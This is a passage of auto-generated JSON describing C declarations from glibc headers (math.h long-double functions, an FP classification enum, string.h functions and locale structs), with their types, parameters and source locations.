"location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:195:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__lgammal_r", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:198:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "rintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=<scratch space>:199:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__rintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=<scratch space>:201:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "nextafterl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=<scratch space>:202:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__nextafterl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=<scratch space>:204:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "nexttowardl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=<scratch space>:205:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__nexttowardl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=<scratch space>:207:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "remainderl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=<scratch space>:209:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__remainderl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=<scratch space>:211:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "scalbnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=<scratch space>:212:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__scalbnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=<scratch space>:214:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "ilogbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=<scratch space>:215:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ilogbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=<scratch space>:217:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scalblnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=<scratch space>:219:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__scalblnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=<scratch space>:221:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "nearbyintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=<scratch space>:222:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__nearbyintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=<scratch space>:224:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "roundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=<scratch space>:225:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__roundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=<scratch space>:227:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "truncl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=<scratch space>:228:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__truncl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=<scratch space>:230:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "remquol", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=<scratch space>:231:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__remquol", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=<scratch space>:233:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "lrintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=<scratch space>:234:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lrintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=<scratch space>:236:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llrintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=<scratch space>:237:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llrintl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=<scratch space>:239:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lroundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=<scratch space>:240:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lroundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=<scratch space>:242:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llroundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=<scratch space>:243:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llroundl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=<scratch space>:245:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fdiml", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=<scratch space>:246:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fdiml", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=<scratch space>:248:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "fmaxl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=<scratch space>:249:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fmaxl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=<scratch space>:251:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "fminl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=<scratch space>:252:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fminl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=<scratch space>:254:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "fmal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=<scratch space>:255:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fmal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=<scratch space>:257:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "scalbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=<scratch space>:259:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__scalbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=<scratch space>:261:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "extern", "name": "signgam", "ns": 0, "location": "/usr/include/math.h:773:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "", "id": 38, "location": "/usr/include/math.h:853:1", "fields": [{ "tag": "field", "name": "FP_NAN", "value": 0 }, { "tag": "field", "name": "FP_INFINITE", "value": 1 }, { "tag": "field", "name": "FP_ZERO", "value": 2 }, { "tag": "field", "name": "FP_SUBNORMAL", "value": 3 }, { "tag": "field", "name": "FP_NORMAL", "value": 4 }] }, { "tag": "function", "name": "memcpy", "ns": 0, "location": "/usr/include/string.h:42:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "memmove", "ns": 0, "location": "/usr/include/string.h:46:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "memccpy", "ns": 0, "location": "/usr/include/string.h:53:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "memset", "ns": 0, "location": "/usr/include/string.h:60:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "memcmp", "ns": 0, "location": "/usr/include/string.h:63:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "memchr", "ns": 0, "location": "/usr/include/string.h:90:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "strcpy", "ns": 0, "location": "/usr/include/string.h:121:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strncpy", "ns": 0, "location": "/usr/include/string.h:124:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strcat", "ns": 0, "location": "/usr/include/string.h:129:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strncat", "ns": 0, "location": "/usr/include/string.h:132:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "strcmp", "ns": 0, "location": "/usr/include/string.h:136:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strncmp", "ns": 0, "location": "/usr/include/string.h:139:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strcoll", "ns": 0, "location": "/usr/include/string.h:143:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__s2", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "strxfrm", "ns": 0, "location": "/usr/include/string.h:146:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dest", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "struct", "ns": 0, "name": "__locale_struct", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h:28:8", "bit-size": 1856, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__locales", "bit-offset": 0, "bit-size": 832, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "__locale_data", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h:31:10", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, "size": 13 } }, { "tag": "field", "name": "__ctype_b", "bit-offset": 832, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } }, { "tag": "field", "name": "__ctype_tolower", "bit-offset": 896, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "field", "name": "__ctype_toupper", "bit-offset": 960, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "field", "name": "__names", "bit-offset": 1024, "bit-size": 832, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "size": 13 } }] }, { "tag": "struct", "ns": 40, "name": "__locale_data", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h:31:10", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "__locale_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h:42:33", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "__locale_struct", "id": 40 } } }, { "tag": "typedef", "ns": 0, "name": "locale_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/locale_t.h:24:20", "type": { "tag": "__locale_t" } }, { "tag": "function", "name": "strcoll_l", "ns": 0, "location": "/usr/include/string.h:155:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s1", "type": { "tag": 